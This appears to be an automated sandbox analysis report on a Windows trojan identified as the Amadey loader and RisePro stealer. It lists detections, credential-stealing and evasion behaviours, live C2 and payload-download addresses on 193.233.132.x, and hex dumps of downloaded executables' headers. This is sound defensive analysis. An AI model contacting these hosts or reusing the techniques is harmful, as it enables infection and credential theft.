Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe
Analysis ID: 1425502
MD5: f70a70f653ae553a805fd21bc3092b13
SHA1: 095ff30abdfdeaa91018556ab4ec92566ad708d4
SHA256: 1ec09530c1153453b1bd0989af58808bc44e069c4608c878a64530bb08fa8840
Tags: exe

Detection

Amadey, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected RisePro Stealer
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Suspicious Add Scheduled Task Parent
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Avira: detected
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://193.233.132.167/mine/amert.exeQ Avira URL Cloud: Label: malware
Source: http://193.233.132.167/mine/random.exeu Avira URL Cloud: Label: malware
Source: http://193.233.132.167/lend/alexxxxxxxx.exe Avira URL Cloud: Label: malware
Source: http://193.233.132.167/mine/random.exeo Avira URL Cloud: Label: malware
Source: http://193.233.132.167/cost/random.exe Avira URL Cloud: Label: malware
Source: http://193.233.132.167/cost/sarra.exe Avira URL Cloud: Label: malware
Source: http://193.233.132.167/mine/random.exe5e67ee Avira URL Cloud: Label: malware
Source: http://193.233.132.167/mine/random.exe Avira URL Cloud: Label: malware
Source: http://193.233.132.167/mine/random.exe5e67ee8 Avira URL Cloud: Label: malware
Source: http://193.233.132.167/mine/amert.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: 13.2.rundll32.exe.6e5b0000.0.unpack Malware Configuration Extractor: Amadey {"C2 url": ["193.233.132.56/Pneh2sXQk0/index.php"]}
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll Virustotal: Detection: 20%
Source: http://193.233.132.56/ Virustotal: Detection: 18%
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllh Virustotal: Detection: 15%
Source: http://193.233.132.167/cost/random.exe Virustotal: Detection: 26%
Source: http://193.233.132.56/Pneh2sXQk0/index.phpll32.dll Virustotal: Detection: 19%
Source: http://193.233.132.167/lend/alexxxxxxxx.exe Virustotal: Detection: 26%
Source: http://193.233.132.167/cost/sarra.exe Virustotal: Detection: 26%
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll Virustotal: Detection: 21%
Source: http://193.233.132.56/Pneh2sXQk0/index.php Virustotal: Detection: 20%
Source: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1=1 Virustotal: Detection: 19%
Source: http://193.233.132.56/Pneh2sXQk0/index.phpF Virustotal: Detection: 19%
Source: http://193.233.132.56/Pneh2sXQk0/index.phpq8 Virustotal: Detection: 19%
Source: http://193.233.132.167/mine/random.exe Virustotal: Detection: 23%
Source: http://193.233.132.56/Pneh2sXQk0/index.phpUsers Virustotal: Detection: 14%
Source: http://193.233.132.56/Pneh2sXQk0/index.phpoded Virustotal: Detection: 19%
Source: http://193.233.132.56/Pneh2sXQk0/index.phpmb3JtLXVybGVuY29kZWQ= Virustotal: Detection: 19%
Source: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1a Virustotal: Detection: 19%
Source: http://193.233.132.167/mine/amert.exe Virustotal: Detection: 26%
Source: C:\ProgramData\MPGPH131\MPGPH131.exe ReversingLabs: Detection: 42%
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Virustotal: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Virustotal: Detection: 78%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Virustotal: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe Virustotal: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sarra[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sarra[1].exe Virustotal: Detection: 45%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll ReversingLabs: Detection: 91%
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Virustotal: Detection: 57%
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000051001\b977f667d6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sarra[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Joe Sandbox ML: detected
Source: 13.2.rundll32.exe.6e5b0000.0.unpack String decryptor: 193.233.132.56
Source: 13.2.rundll32.exe.6e5b0000.0.unpack String decryptor: /Pneh2sXQk0/index.php
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.6.dr
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini

Networking

Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49737 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 193.233.132.56:80 -> 192.168.2.4:49737
Source: Traffic Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.4:49741 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.4:49742 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.4:49743 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.4:49745 -> 147.45.47.93:58709
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.4:49745
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.4:49745 -> 147.45.47.93:58709
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.4:49746
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.4:49747
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.4:49748 -> 193.233.132.56:80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
Source: Malware configuration extractor IPs: 193.233.132.56
Source: global traffic TCP traffic: 147.45.47.93 ports 0,5,7,8,58709,9
Source: global traffic TCP traffic: 192.168.2.4:49745 -> 147.45.47.93:58709
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Apr 2024 18:21:05 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Sun, 03 Mar 2024 11:54:33 GMTConnection: keep-aliveETag: "65e464f9-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 69 12 e4 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Apr 2024 18:21:06 GMTContent-Type: application/octet-streamContent-Length: 2256896Last-Modified: Sat, 13 Apr 2024 16:50:12 GMTConnection: keep-aliveETag: "661ab7c4-227000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b6 2a 19 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 ac 03 00 00 00 00 00 00 10 58 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 58 00 00 04 00 00 ac 52 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 4c e1 57 00 4c 00 00 00 6d 80 14 00 95 00 00 00 00 50 14 00 50 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c e1 57 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec e0 57 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 50 2e 00 00 00 50 14 00 00 0c 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 14 00 00 02 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 90 14 00 00 02 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6d 6d 69 71 77 62 64 00 10 19 00 00 00 3f 00 00 10 19 00 00 5e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 7a 6e 6d 79 77 64 70 00 10 00 00 00 10 58 00 00 02 00 00 00 6e 22 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Apr 2024 18:21:09 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 03 Mar 2024 11:54:32 GMTConnection: keep-aliveETag: "65e464f8-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a 12 e4 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 
61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Apr 2024 18:21:12 GMTContent-Type: application/octet-streamContent-Length: 2263040Last-Modified: Sat, 13 Apr 2024 16:50:25 GMTConnection: keep-aliveETag: "661ab7d1-228800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b6 2a 19 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 c0 03 00 00 00 00 00 00 90 58 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 58 00 00 04 00 00 3b 36 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 5a 58 00 4c 00 00 00 5e 80 14 00 72 00 00 00 00 50 14 00 58 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5a 58 00 10 00 00 00 00 00 00 00 00 00 